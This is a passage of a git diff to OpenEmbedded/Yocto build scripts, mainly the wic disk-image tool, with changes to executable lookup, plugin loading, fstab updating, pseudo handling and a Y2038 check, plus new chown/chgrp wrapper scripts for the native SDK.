@@ -142,7 +146,7 @@ def generic_get_log(sectionname, results, section):
return decode_log(ptest['log'])
def ptestresult_get_log(results, section):
- return generic_get_log('ptestresuls.sections', results, section)
+ return generic_get_log('ptestresult.sections', results, section)
def generic_get_rawlogs(sectname, results):
if sectname not in results:
diff --git a/scripts/lib/scriptutils.py b/scripts/lib/scriptutils.py
index f92255d8dc..47a08194d0 100644
--- a/scripts/lib/scriptutils.py
+++ b/scripts/lib/scriptutils.py
@@ -18,7 +18,8 @@ import sys
import tempfile
import threading
import importlib
-from importlib import machinery
+import importlib.machinery
+import importlib.util
class KeepAliveStreamHandler(logging.StreamHandler):
def __init__(self, keepalive=True, **kwargs):
@@ -82,7 +83,9 @@ def load_plugins(logger, plugins, pluginpath):
logger.debug('Loading plugin %s' % name)
spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] )
if spec:
- return spec.loader.load_module()
+ mod = importlib.util.module_from_spec(spec)
+ spec.loader.exec_module(mod)
+ return mod
def plugin_name(filename):
return os.path.splitext(os.path.basename(filename))[0]
@@ -215,7 +218,8 @@ def fetch_url(tinfoil, srcuri, srcrev, destdir, logger, preserve_tmp=False, mirr
pathvars = ['T', 'RECIPE_SYSROOT', 'RECIPE_SYSROOT_NATIVE']
for pathvar in pathvars:
path = rd.getVar(pathvar)
- shutil.rmtree(path)
+ if os.path.exists(path):
+ shutil.rmtree(path)
finally:
if fetchrecipe:
try:
diff --git a/scripts/lib/wic/engine.py b/scripts/lib/wic/engine.py
index 9ff4394757..7dbde85696 100644
--- a/scripts/lib/wic/engine.py
+++ b/scripts/lib/wic/engine.py
@@ -19,10 +19,10 @@ import os
import tempfile
import json
import subprocess
+import shutil
import re
from collections import namedtuple, OrderedDict
-from distutils.spawn import find_executable
from wic import WicError
from wic.filemap import sparse_copy
@@ -245,7 +245,7 @@ class Disk:
for path in pathlist.split(':'):
self.paths = "%s%s:%s" % (native_sysroot, path, self.paths)
- self.parted = find_executable("parted", self.paths)
+ self.parted = shutil.which("parted", path=self.paths)
if not self.parted:
raise WicError("Can't find executable parted")
@@ -283,7 +283,7 @@ class Disk:
"resize2fs", "mkswap", "mkdosfs", "debugfs"):
aname = "_%s" % name
if aname not in self.__dict__:
- setattr(self, aname, find_executable(name, self.paths))
+ setattr(self, aname, shutil.which(name, path=self.paths))
if aname not in self.__dict__ or self.__dict__[aname] is None:
raise WicError("Can't find executable '{}'".format(name))
return self.__dict__[aname]
diff --git a/scripts/lib/wic/help.py b/scripts/lib/wic/help.py
index 1e3d06a87b..fcace95ff4 100644
--- a/scripts/lib/wic/help.py
+++ b/scripts/lib/wic/help.py
@@ -840,8 +840,8 @@ DESCRIPTION
meanings. The commands are based on the Fedora kickstart
documentation but with modifications to reflect wic capabilities.
- http://fedoraproject.org/wiki/Anaconda/Kickstart#part_or_partition
- http://fedoraproject.org/wiki/Anaconda/Kickstart#bootloader
+ https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#part-or-partition
+ https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#bootloader
Commands
@@ -980,6 +980,12 @@ DESCRIPTION
copies. This option only has an effect with the rootfs
source plugin.
+ --change-directory: This option is specific to wic. It changes to the
+ given directory before copying the files. This
+ option is useful when we want to split a rootfs in
+ multiple partitions and we want to keep the right
+ permissions and usernames in all the partitions.
+
--extra-space: This option is specific to wic. It adds extra
space after the space filled by the content
of the partition. The final size can go
diff --git a/scripts/lib/wic/ksparser.py b/scripts/lib/wic/ksparser.py
index 76cc55b848..452a160232 100644
--- a/scripts/lib/wic/ksparser.py
+++ b/scripts/lib/wic/ksparser.py
@@ -152,6 +152,7 @@ class KickStart():
part.add_argument('--offset', type=sizetype("K", True))
part.add_argument('--exclude-path', nargs='+')
part.add_argument('--include-path', nargs='+')
+ part.add_argument('--change-directory')
part.add_argument("--extra-space", type=sizetype("M"))
part.add_argument('--fsoptions', dest='fsopts')
part.add_argument('--fstype', default='vfat',
@@ -228,6 +229,23 @@ class KickStart():
err = "%s:%d: SquashFS does not support LABEL" \
% (confpath, lineno)
raise KickStartError(err)
+ if parsed.fstype == 'msdos' or parsed.fstype == 'vfat':
+ if parsed.fsuuid:
+ if parsed.fsuuid.upper().startswith('0X'):
+ if len(parsed.fsuuid) > 10:
+ err = "%s:%d: fsuuid %s given in wks kickstart file " \
+ "exceeds the length limit for %s filesystem. " \
+ "It should be in the form of a 32 bit hexadecimal" \
+ "number (for example, 0xABCD1234)." \
+ % (confpath, lineno, parsed.fsuuid, parsed.fstype)
+ raise KickStartError(err)
+ elif len(parsed.fsuuid) > 8:
+ err = "%s:%d: fsuuid %s given in wks kickstart file " \
+ "exceeds the length limit for %s filesystem. " \
+ "It should be in the form of a 32 bit hexadecimal" \
+ "number (for example, 0xABCD1234)." \
+ % (confpath, lineno, parsed.fsuuid, parsed.fstype)
+ raise KickStartError(err)
if parsed.use_label and not parsed.label:
err = "%s:%d: Must set the label with --label" \
% (confpath, lineno)
diff --git a/scripts/lib/wic/misc.py b/scripts/lib/wic/misc.py
index fe4abe8115..3e11822996 100644
--- a/scripts/lib/wic/misc.py
+++ b/scripts/lib/wic/misc.py
@@ -16,9 +16,9 @@ import logging
import os
import re
import subprocess
+import shutil
from collections import defaultdict
-from distutils import spawn
from wic import WicError
@@ -26,6 +26,7 @@ logger = logging.getLogger('wic')
# executable -> recipe pairs for exec_native_cmd
NATIVE_RECIPES = {"bmaptool": "bmap-tools",
+ "dumpe2fs": "e2fsprogs",
"grub-mkimage": "grub-efi",
"isohybrid": "syslinux",
"mcopy": "mtools",
@@ -45,7 +46,8 @@ NATIVE_RECIPES = {"bmaptool": "bmap-tools",
"parted": "parted",
"sfdisk": "util-linux",
"sgdisk": "gptfdisk",
- "syslinux": "syslinux"
+ "syslinux": "syslinux",
+ "tar": "tar"
}
def runtool(cmdln_or_args):
@@ -112,6 +114,15 @@ def exec_cmd(cmd_and_args, as_shell=False):
"""
return _exec_cmd(cmd_and_args, as_shell)[1]
+def find_executable(cmd, paths):
+ recipe = cmd
+ if recipe in NATIVE_RECIPES:
+ recipe = NATIVE_RECIPES[recipe]
+ provided = get_bitbake_var("ASSUME_PROVIDED")
+ if provided and "%s-native" % recipe in provided:
+ return True
+
+ return shutil.which(cmd, path=paths)
def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""):
"""
@@ -128,16 +139,19 @@ def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""):
if pseudo:
cmd_and_args = pseudo + cmd_and_args
- native_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin:%s/bin" % \
+ hosttools_dir = get_bitbake_var("HOSTTOOLS_DIR")
+
+ native_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin:%s/bin:%s" % \
(native_sysroot, native_sysroot,
- native_sysroot, native_sysroot)
+ native_sysroot, native_sysroot,
+ hosttools_dir)
native_cmd_and_args = "export PATH=%s:$PATH;%s" % \
(native_paths, cmd_and_args)
logger.debug("exec_native_cmd: %s", native_cmd_and_args)
# If the command isn't in the native sysroot say we failed.
- if spawn.find_executable(args[0], native_paths):
+ if find_executable(args[0], native_paths):
ret, out = _exec_cmd(native_cmd_and_args, True)
else:
ret = 127
diff --git a/scripts/lib/wic/partition.py b/scripts/lib/wic/partition.py
index 3490b4e75d..792bb3dcd3 100644
--- a/scripts/lib/wic/partition.py
+++ b/scripts/lib/wic/partition.py
@@ -31,6 +31,7 @@ class Partition():
self.extra_space = args.extra_space
self.exclude_path = args.exclude_path
self.include_path = args.include_path
+ self.change_directory = args.change_directory
self.fsopts = args.fsopts
self.fstype = args.fstype
self.label = args.label
@@ -53,6 +54,9 @@ class Partition():
self.uuid = args.uuid
self.fsuuid = args.fsuuid
self.type = args.type
+ self.updated_fstab_path = None
+ self.has_fstab = False
+ self.update_fstab_in_rootfs = False
self.lineno = lineno
self.source_file = ""
@@ -100,7 +104,7 @@ class Partition():
extra_blocks = self.extra_space
rootfs_size = actual_rootfs_size + extra_blocks
- rootfs_size *= self.overhead_factor
+ rootfs_size = int(rootfs_size * self.overhead_factor)
logger.debug("Added %d extra blocks to %s to get to %d total blocks",
extra_blocks, self.mountpoint, rootfs_size)
@@ -117,11 +121,15 @@ class Partition():
return self.fixed_size if self.fixed_size else self.size
def prepare(self, creator, cr_workdir, oe_builddir, rootfs_dir,
- bootimg_dir, kernel_dir, native_sysroot):
+ bootimg_dir, kernel_dir, native_sysroot, updated_fstab_path):
"""
Prepare content for individual partitions, depending on
partition command parameters.
"""
+ self.updated_fstab_path = updated_fstab_path
+ if self.updated_fstab_path and not (self.fstype.startswith("ext") or self.fstype == "msdos"):
+ self.update_fstab_in_rootfs = True
+
if not self.source:
if not self.size and not self.fixed_size:
raise WicError("The %s partition has a size of zero. Please "
@@ -191,29 +199,40 @@ class Partition():
(self.mountpoint, self.size, self.fixed_size))
def prepare_rootfs(self, cr_workdir, oe_builddir, rootfs_dir,
- native_sysroot, real_rootfs = True):
+ native_sysroot, real_rootfs = True, pseudo_dir = None):
"""
Prepare content for a rootfs partition i.e. create a partition
and fill it from a /rootfs dir.
Currently handles ext2/3/4, btrfs, vfat and squashfs.
"""
- p_prefix = os.environ.get("PSEUDO_PREFIX", "%s/usr" % native_sysroot)
- p_localstatedir = os.environ.get("PSEUDO_LOCALSTATEDIR",
- "%s/../pseudo" % rootfs_dir)
- p_passwd = os.environ.get("PSEUDO_PASSWD", rootfs_dir)
- p_nosymlinkexp = os.environ.get("PSEUDO_NOSYMLINKEXP", "1")
- pseudo = "export PSEUDO_PREFIX=%s;" % p_prefix
- pseudo += "export PSEUDO_LOCALSTATEDIR=%s;" % p_localstatedir
- pseudo += "export PSEUDO_PASSWD=%s;" % p_passwd
- pseudo += "export PSEUDO_NOSYMLINKEXP=%s;" % p_nosymlinkexp
- pseudo += "%s " % get_bitbake_var("FAKEROOTCMD")
rootfs = "%s/rootfs_%s.%s.%s" % (cr_workdir, self.label,
self.lineno, self.fstype)
if os.path.isfile(rootfs):
os.remove(rootfs)
+ p_prefix = os.environ.get("PSEUDO_PREFIX", "%s/usr" % native_sysroot)
+ if (pseudo_dir):
+ # Canonicalize the ignore paths. This corresponds to
+ # calling oe.path.canonicalize(), which is used in bitbake.conf.
+ ignore_paths = [rootfs] + (get_bitbake_var("PSEUDO_IGNORE_PATHS") or "").split(",")
+ canonical_paths = []
+ for path in ignore_paths:
+ if "$" not in path:
+ trailing_slash = path.endswith("/") and "/" or ""
+ canonical_paths.append(os.path.realpath(path) + trailing_slash)
+ ignore_paths = ",".join(canonical_paths)
+
+ pseudo = "export PSEUDO_PREFIX=%s;" % p_prefix
+ pseudo += "export PSEUDO_LOCALSTATEDIR=%s;" % pseudo_dir
+ pseudo += "export PSEUDO_PASSWD=%s;" % rootfs_dir
+ pseudo += "export PSEUDO_NOSYMLINKEXP=1;"
+ pseudo += "export PSEUDO_IGNORE_PATHS=%s;" % ignore_paths
+ pseudo += "%s " % get_bitbake_var("FAKEROOTCMD")
+ else:
+ pseudo = None
+
if not self.size and real_rootfs:
# The rootfs size is not set in .ks file so try to get it
# from bitbake variable
@@ -235,7 +254,7 @@ class Partition():
prefix = "ext" if self.fstype.startswith("ext") else self.fstype
method = getattr(self, "prepare_rootfs_" + prefix)
- method(rootfs, oe_builddir, rootfs_dir, native_sysroot, pseudo)
+ method(rootfs, cr_workdir, oe_builddir, rootfs_dir, native_sysroot, pseudo)
self.source_file = rootfs
# get the rootfs size in the right units for kickstart (kB)
@@ -243,7 +262,7 @@ class Partition():
out = exec_cmd(du_cmd)
self.size = int(out.split()[0])
- def prepare_rootfs_ext(self, rootfs, oe_builddir, rootfs_dir,
+ def prepare_rootfs_ext(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
native_sysroot, pseudo):
"""
Prepare content for an ext2/3/4 rootfs partition.
@@ -267,10 +286,21 @@ class Partition():
(self.fstype, extraopts, rootfs, label_str, self.fsuuid, rootfs_dir)
exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
+ if self.updated_fstab_path and self.has_fstab:
+ debugfs_script_path = os.path.join(cr_workdir, "debugfs_script")
+ with open(debugfs_script_path, "w") as f:
+ f.write("cd etc\n")
+ f.write("rm fstab\n")
+ f.write("write %s fstab\n" % (self.updated_fstab_path))
+ debugfs_cmd = "debugfs -w -f %s %s" % (debugfs_script_path, rootfs)
+ exec_native_cmd(debugfs_cmd, native_sysroot)
+
mkfs_cmd = "fsck.%s -pvfD %s" % (self.fstype, rootfs)
exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
- def prepare_rootfs_btrfs(self, rootfs, oe_builddir, rootfs_dir,
+ self.check_for_Y2038_problem(rootfs, native_sysroot)
+
+ def prepare_rootfs_btrfs(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
native_sysroot, pseudo):
"""
Prepare content for a btrfs rootfs partition.
@@ -293,7 +323,7 @@ class Partition():
self.mkfs_extraopts, self.fsuuid, rootfs)
exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
- def prepare_rootfs_msdos(self, rootfs, oe_builddir, rootfs_dir,
+ def prepare_rootfs_msdos(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
native_sysroot, pseudo):
"""
Prepare content for a msdos/vfat rootfs partition.
@@ -322,12 +352,16 @@ class Partition():
mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (rootfs, rootfs_dir)
exec_native_cmd(mcopy_cmd, native_sysroot)
+ if self.updated_fstab_path and self.has_fstab:
+ mcopy_cmd = "mcopy -i %s %s ::/etc/fstab" % (rootfs, self.updated_fstab_path)
+ exec_native_cmd(mcopy_cmd, native_sysroot)
+
chmod_cmd = "chmod 644 %s" % rootfs
exec_cmd(chmod_cmd)
prepare_rootfs_vfat = prepare_rootfs_msdos
- def prepare_rootfs_squashfs(self, rootfs, oe_builddir, rootfs_dir,
+ def prepare_rootfs_squashfs(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
native_sysroot, pseudo):
"""
Prepare content for a squashfs rootfs partition.
@@ -356,6 +390,8 @@ class Partition():
(self.fstype, extraopts, label_str, self.fsuuid, rootfs)
exec_native_cmd(mkfs_cmd, native_sysroot)
+ self.check_for_Y2038_problem(rootfs, native_sysroot)
+
def prepare_empty_partition_btrfs(self, rootfs, oe_builddir,
native_sysroot):
"""
@@ -417,3 +453,37 @@ class Partition():
mkswap_cmd = "mkswap %s -U %s %s" % (label_str, self.fsuuid, path)
exec_native_cmd(mkswap_cmd, native_sysroot)
+
+ def check_for_Y2038_problem(self, rootfs, native_sysroot):
+ """
+ Check if the filesystem is affected by the Y2038 problem
+ (Y2038 problem = 32 bit time_t overflow in January 2038)
+ """
+ def get_err_str(part):
+ err = "The {} filesystem {} has no Y2038 support."
+ if part.mountpoint:
+ args = [part.fstype, "mounted at %s" % part.mountpoint]
+ elif part.label:
+ args = [part.fstype, "labeled '%s'" % part.label]
+ elif part.part_name:
+ args = [part.fstype, "in partition '%s'" % part.part_name]
+ else:
+ args = [part.fstype, "in partition %s" % part.num]
+ return err.format(*args)
+
+ # ext2 and ext3 are always affected by the Y2038 problem
+ if self.fstype in ["ext2", "ext3"]:
+ logger.warn(get_err_str(self))
+ return
+
+ ret, out = exec_native_cmd("dumpe2fs %s" % rootfs, native_sysroot)
+
+ # if ext4 is affected by the Y2038 problem depends on the inode size
+ for line in out.splitlines():
+ if line.startswith("Inode size:"):
+ size = int(line.split(":")[1].strip())
+ if size < 256:
+ logger.warn("%s Inodes (of size %d) are too small." %
+ (get_err_str(self), size))
+ break
+
diff --git a/scripts/lib/wic/pluginbase.py b/scripts/lib/wic/pluginbase.py
index d9b4e57747..b64568339b 100644
--- a/scripts/lib/wic/pluginbase.py
+++ b/scripts/lib/wic/pluginbase.py
@@ -9,9 +9,11 @@ __all__ = ['ImagerPlugin', 'SourcePlugin']
import os
import logging
+import types
from collections import defaultdict
-from importlib.machinery import SourceFileLoader
+import importlib
+import importlib.util
from wic import WicError
from wic.misc import get_bitbake_var
@@ -54,7 +56,9 @@ class PluginMgr:
mname = fname[:-3]
mpath = os.path.join(ppath, fname)
logger.debug("loading plugin module %s", mpath)
- SourceFileLoader(mname, mpath).load_module()
+ spec = importlib.util.spec_from_file_location(mname, mpath)
+ module = importlib.util.module_from_spec(spec)
+ spec.loader.exec_module(module)
return PLUGINS.get(ptype)
diff --git a/scripts/lib/wic/plugins/imager/direct.py b/scripts/lib/wic/plugins/imager/direct.py
index 55db826e93..42704d1e10 100644
--- a/scripts/lib/wic/plugins/imager/direct.py
+++ b/scripts/lib/wic/plugins/imager/direct.py
@@ -58,11 +58,11 @@ class DirectPlugin(ImagerPlugin):
self.compressor = options.compressor
self.bmap = options.bmap
self.no_fstab_update = options.no_fstab_update
- self.original_fstab = None
+ self.updated_fstab_path = None
self.name = "%s-%s" % (os.path.splitext(os.path.basename(wks_file))[0],
strftime("%Y%m%d%H%M"))
- self.workdir = tempfile.mkdtemp(dir=self.outdir, prefix='tmp.wic.')
+ self.workdir = self.setup_workdir(options.workdir)
self._image = None
self.ptable_format = self.ks.bootloader.ptable
self.parts = self.ks.partitions
@@ -78,6 +78,16 @@ class DirectPlugin(ImagerPlugin):
self._image = PartitionedImage(image_path, self.ptable_format,
self.parts, self.native_sysroot)
+ def setup_workdir(self, workdir):
+ if workdir:
+ if os.path.exists(workdir):
+ raise WicError("Internal workdir '%s' specified in wic arguments already exists!" % (workdir))
+
+ os.makedirs(workdir)
+ return workdir
+ else:
+ return tempfile.mkdtemp(dir=self.outdir, prefix='tmp.wic.')
+
def do_create(self):
"""
Plugin entry point.
@@ -90,11 +100,8 @@ class DirectPlugin(ImagerPlugin):
finally:
self.cleanup()
- def _write_fstab(self, image_rootfs):
- """overriden to generate fstab (temporarily) in rootfs. This is called
- from _create, make sure it doesn't get called from
- BaseImage.create()
- """
+ def update_fstab(self, image_rootfs):
+ """Assume partition order same as in wks"""
if not image_rootfs:
return
@@ -104,20 +111,11 @@ class DirectPlugin(ImagerPlugin):
with open(fstab_path) as fstab:
fstab_lines = fstab.readlines()
- self.original_fstab = fstab_lines.copy()
-
- if self._update_fstab(fstab_lines, self.parts):
- with open(fstab_path, "w") as fstab:
- fstab.writelines(fstab_lines)
- else:
- self.original_fstab = None
- def _update_fstab(self, fstab_lines, parts):
- """Assume partition order same as in wks"""
updated = False
- for part in parts:
+ for part in self.parts:
if not part.realnum or not part.mountpoint \
- or part.mountpoint == "/":
+ or part.mountpoint == "/" or not (part.mountpoint.startswith('/') or part.mountpoint == "swap"):
continue
if part.use_uuid:
@@ -144,7 +142,10 @@ class DirectPlugin(ImagerPlugin):
fstab_lines.append(line)
updated = True
- return updated
+ if updated:
+ self.updated_fstab_path = os.path.join(self.workdir, "fstab")
+ with open(self.updated_fstab_path, "w") as f:
+ f.writelines(fstab_lines)
def _full_path(self, path, name, extention):
""" Construct full file path to a file we generate. """
@@ -160,7 +161,7 @@ class DirectPlugin(ImagerPlugin):
a partitioned image.
"""
if not self.no_fstab_update:
- self._write_fstab(self.rootfs_dir.get("ROOTFS_DIR"))
+ self.update_fstab(self.rootfs_dir.get("ROOTFS_DIR"))
for part in self.parts:
# get rootfs size from bitbake variable if it's not set in .ks file
@@ -273,12 +274,6 @@ class DirectPlugin(ImagerPlugin):
if os.path.isfile(path):
shutil.move(path, os.path.join(self.outdir, fname))
- #Restore original fstab
- if self.original_fstab:
- fstab_path = self.rootfs_dir.get("ROOTFS_DIR") + "/etc/fstab"
- with open(fstab_path, "w") as fstab:
- fstab.writelines(self.original_fstab)
-
# remove work directory
shutil.rmtree(self.workdir, ignore_errors=True)
@@ -343,6 +338,13 @@ class PartitionedImage():
part.fsuuid = '0x' + str(uuid.uuid4())[:8].upper()
else:
part.fsuuid = str(uuid.uuid4())
+ else:
+ #make sure the fsuuid for vfat/msdos align with format 0xYYYYYYYY
+ if part.fstype == 'vfat' or part.fstype == 'msdos':
+ if part.fsuuid.upper().startswith("0X"):
+ part.fsuuid = '0x' + part.fsuuid.upper()[2:].rjust(8,"0")
+ else:
+ part.fsuuid = '0x' + part.fsuuid.upper().rjust(8,"0")
def prepare(self, imager):
"""Prepare an image. Call prepare method of all image partitions."""
@@ -351,7 +353,8 @@ class PartitionedImage():
# sizes before we can add them and do the layout.
part.prepare(imager, imager.workdir, imager.oe_builddir,
imager.rootfs_dir, imager.bootimg_dir,
- imager.kernel_dir, imager.native_sysroot)
+ imager.kernel_dir, imager.native_sysroot,
+ imager.updated_fstab_path)
# Converting kB to sectors for parted
part.size_sec = part.disk_size * 1024 // self.sector_size
diff --git a/scripts/lib/wic/plugins/source/bootimg-efi.py b/scripts/lib/wic/plugins/source/bootimg-efi.py
index 2cfdc10ecd..05e8471116 100644
--- a/scripts/lib/wic/plugins/source/bootimg-efi.py
+++ b/scripts/lib/wic/plugins/source/bootimg-efi.py
@@ -277,6 +277,13 @@ class BootimgEFIPlugin(SourcePlugin):
logger.debug("Added %d extra blocks to %s to get to %d total blocks",
extra_blocks, part.mountpoint, blocks)
+ # required for compatibility with certain devices expecting file system
+ # block count to be equal to partition block count
+ if blocks < part.fixed_size:
+ blocks = part.fixed_size
+ logger.debug("Overriding %s to %d total blocks for compatibility",
+ part.mountpoint, blocks)
+
# dosfs image, created by mkdosfs
bootimg = "%s/boot.img" % cr_workdir
diff --git a/scripts/lib/wic/plugins/source/bootimg-partition.py b/scripts/lib/wic/plugins/source/bootimg-partition.py
index 138986a71e..5dbe2558d2 100644
--- a/scripts/lib/wic/plugins/source/bootimg-partition.py
+++ b/scripts/lib/wic/plugins/source/bootimg-partition.py
@@ -141,7 +141,7 @@ class BootimgPartitionPlugin(SourcePlugin):
break
if not kernel_name:
- raise WicError('No kernel file founded')
+ raise WicError('No kernel file found')
# Compose the extlinux.conf
extlinux_conf = "default Yocto\n"
diff --git a/scripts/lib/wic/plugins/source/bootimg-pcbios.py b/scripts/lib/wic/plugins/source/bootimg-pcbios.py
index f2639e7004..32e47f1831 100644
--- a/scripts/lib/wic/plugins/source/bootimg-pcbios.py
+++ b/scripts/lib/wic/plugins/source/bootimg-pcbios.py
@@ -186,8 +186,10 @@ class BootimgPcbiosPlugin(SourcePlugin):
# dosfs image, created by mkdosfs
bootimg = "%s/boot%s.img" % (cr_workdir, part.lineno)
- dosfs_cmd = "mkdosfs -n boot -i %s -S 512 -C %s %d" % \
- (part.fsuuid, bootimg, blocks)
+ label = part.label if part.label else "boot"
+
+ dosfs_cmd = "mkdosfs -n %s -i %s -S 512 -C %s %d" % \
+ (label, part.fsuuid, bootimg, blocks)
exec_native_cmd(dosfs_cmd, native_sysroot)
mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (bootimg, hdddir)
diff --git a/scripts/lib/wic/plugins/source/rootfs.py b/scripts/lib/wic/plugins/source/rootfs.py
index 705aeb5563..c8c1c0f58f 100644
--- a/scripts/lib/wic/plugins/source/rootfs.py
+++ b/scripts/lib/wic/plugins/source/rootfs.py
@@ -20,7 +20,7 @@ from oe.path import copyhardlinktree
from wic import WicError
from wic.pluginbase import SourcePlugin
-from wic.misc import get_bitbake_var
+from wic.misc import get_bitbake_var, exec_native_cmd
logger = logging.getLogger('wic')
@@ -44,6 +44,15 @@ class RootfsPlugin(SourcePlugin):
return os.path.realpath(image_rootfs_dir)
+ @staticmethod
+ def __get_pseudo(native_sysroot, rootfs, pseudo_dir):
+ pseudo = "export PSEUDO_PREFIX=%s/usr;" % native_sysroot
+ pseudo += "export PSEUDO_LOCALSTATEDIR=%s;" % pseudo_dir
+ pseudo += "export PSEUDO_PASSWD=%s;" % rootfs
+ pseudo += "export PSEUDO_NOSYMLINKEXP=1;"
+ pseudo += "%s " % get_bitbake_var("FAKEROOTCMD")
+ return pseudo
+
@classmethod
def do_prepare_partition(cls, part, source_params, cr, cr_workdir,
oe_builddir, bootimg_dir, kernel_dir,
@@ -68,18 +77,55 @@ class RootfsPlugin(SourcePlugin):
"it is not a valid path, exiting" % part.rootfs_dir)
part.rootfs_dir = cls.__get_rootfs_dir(rootfs_dir)
+ part.has_fstab = os.path.exists(os.path.join(part.rootfs_dir, "etc/fstab"))
+ pseudo_dir = os.path.join(part.rootfs_dir, "../pseudo")
+ if not os.path.lexists(pseudo_dir):
+ logger.warn("%s folder does not exist. "
+ "Usernames and permissions will be invalid " % pseudo_dir)
+ pseudo_dir = None
new_rootfs = None
+ new_pseudo = None
# Handle excluded paths.
- if part.exclude_path or part.include_path:
- # We need a new rootfs directory we can delete files from. Copy to
- # workdir.
+ if part.exclude_path or part.include_path or part.change_directory or part.update_fstab_in_rootfs:
+ # We need a new rootfs directory we can safely modify without
+ # interfering with other tasks. Copy to workdir.
new_rootfs = os.path.realpath(os.path.join(cr_workdir, "rootfs%d" % part.lineno))
if os.path.lexists(new_rootfs):
shutil.rmtree(os.path.join(new_rootfs))
- copyhardlinktree(part.rootfs_dir, new_rootfs)
+ if part.change_directory:
+ cd = part.change_directory
+ if cd[-1] == '/':
+ cd = cd[:-1]
+ if os.path.isabs(cd):
+ logger.error("Must be relative: --change-directory=%s" % cd)
+ sys.exit(1)
+ orig_dir = os.path.realpath(os.path.join(part.rootfs_dir, cd))
+ if not orig_dir.startswith(part.rootfs_dir):
+ logger.error("'%s' points to a path outside the rootfs" % orig_dir)
+ sys.exit(1)
+
+ else:
+ orig_dir = part.rootfs_dir
+ copyhardlinktree(orig_dir, new_rootfs)
+
+ # Convert the pseudo directory to its new location
+ if (pseudo_dir):
+ new_pseudo = os.path.realpath(
+ os.path.join(cr_workdir, "pseudo%d" % part.lineno))
+ if os.path.lexists(new_pseudo):
+ shutil.rmtree(new_pseudo)
+ os.mkdir(new_pseudo)
+ shutil.copy(os.path.join(pseudo_dir, "files.db"),
+ os.path.join(new_pseudo, "files.db"))
+
+ pseudo_cmd = "%s -B -m %s -M %s" % (cls.__get_pseudo(native_sysroot,
+ new_rootfs,
+ new_pseudo),
+ orig_dir, new_rootfs)
+ exec_native_cmd(pseudo_cmd, native_sysroot)
for path in part.include_path or []:
copyhardlinktree(path, new_rootfs)
@@ -99,17 +145,34 @@ class RootfsPlugin(SourcePlugin):
logger.error("'%s' points to a path outside the rootfs" % orig_path)
sys.exit(1)
+ if new_pseudo:
+ pseudo = cls.__get_pseudo(native_sysroot, new_rootfs, new_pseudo)
+ else:
+ pseudo = None
if path.endswith(os.sep):
# Delete content only.
for entry in os.listdir(full_path):
full_entry = os.path.join(full_path, entry)
- if os.path.isdir(full_entry) and not os.path.islink(full_entry):
- shutil.rmtree(full_entry)
- else:
- os.remove(full_entry)
+ rm_cmd = "rm -rf %s" % (full_entry)
+ exec_native_cmd(rm_cmd, native_sysroot, pseudo)
else:
# Delete whole directory.
- shutil.rmtree(full_path)
+ rm_cmd = "rm -rf %s" % (full_path)
+ exec_native_cmd(rm_cmd, native_sysroot, pseudo)
+
+ # Update part.has_fstab here as fstab may have been added or
+ # removed by the above modifications.
+ part.has_fstab = os.path.exists(os.path.join(new_rootfs, "etc/fstab"))
+ if part.update_fstab_in_rootfs and part.has_fstab:
+ fstab_path = os.path.join(new_rootfs, "etc/fstab")
+ # Assume that fstab should always be owned by root with fixed permissions
+ install_cmd = "install -m 0644 %s %s" % (part.updated_fstab_path, fstab_path)
+ if new_pseudo:
+ pseudo = cls.__get_pseudo(native_sysroot, new_rootfs, new_pseudo)
+ else:
+ pseudo = None
+ exec_native_cmd(install_cmd, native_sysroot, pseudo)
part.prepare_rootfs(cr_workdir, oe_builddir,
- new_rootfs or part.rootfs_dir, native_sysroot)
+ new_rootfs or part.rootfs_dir, native_sysroot,
+ pseudo_dir = new_pseudo or pseudo_dir)
diff --git a/scripts/nativesdk-intercept/chgrp b/scripts/nativesdk-intercept/chgrp
new file mode 100755
index 0000000000..30cc417d3a
--- /dev/null
+++ b/scripts/nativesdk-intercept/chgrp
@@ -0,0 +1,27 @@
+#!/usr/bin/env python3
+#
+# Wrapper around 'chgrp' that redirects to root in all cases
+
+import os
+import shutil
+import sys
+
+# calculate path to the real 'chgrp'
+path = os.environ['PATH']
+path = path.replace(os.path.dirname(sys.argv[0]), '')
+real_chgrp = shutil.which('chgrp', path=path)
+
+args = list()
+
+found = False
+for i in sys.argv:
+ if i.startswith("-"):
+ args.append(i)
+ continue
+ if not found:
+ args.append("root")
+ found = True
+ else:
+ args.append(i)
+
+os.execv(real_chgrp, args)
diff --git a/scripts/nativesdk-intercept/chown b/scripts/nativesdk-intercept/chown
new file mode 100755
index 0000000000..3914b3e384
--- /dev/null
+++ b/scripts/nativesdk-intercept/chown
@@ -0,0 +1,27 @@
+#!/usr/bin/env python3
+#
+# Wrapper around 'chown' that redirects to root in all cases
+
+import os
+import shutil
+import sys
+
+# calculate path to the real 'chown'
+path = os.environ['PATH']
+path = path.replace(os.path.dirname(sys.argv[0]), '')
+real_chown = shutil.which('chown', path=path)
+
+args = list()
+
+found = False
+for i in sys.argv:
+ if i.startswith("-"):
+ args.append(i)
+ continue
+ if not found:
+ args.append("root:root")
+ found = True
+ else:
+ args.append(i)
+
+os.execv(real_chown, args)
diff --git a/scripts/oe-depends-dot b/scripts/oe-depends-dot
index 5eb3e12769..1c2d51c6ec 100755
--- a/scripts/oe-depends-dot
+++ b/scripts/oe-depends-dot
@@ -15,7 +15,7 @@ class Dot(object):
def __init__(self):
parser = argparse.ArgumentParser(
description="Analyse recipe-depends.dot generated by bitbake -g",
- epilog="Use %(prog)s --help to get help")
+ formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("dotfile",
help = "Specify the dotfile", nargs = 1, action='store', default='')
parser.add_argument("-k", "--key",
@@ -32,6 +32,21 @@ class Dot(object):
" For example, A->B, B->C, A->C, then A->C can be removed.",
action="store_true", default=False)
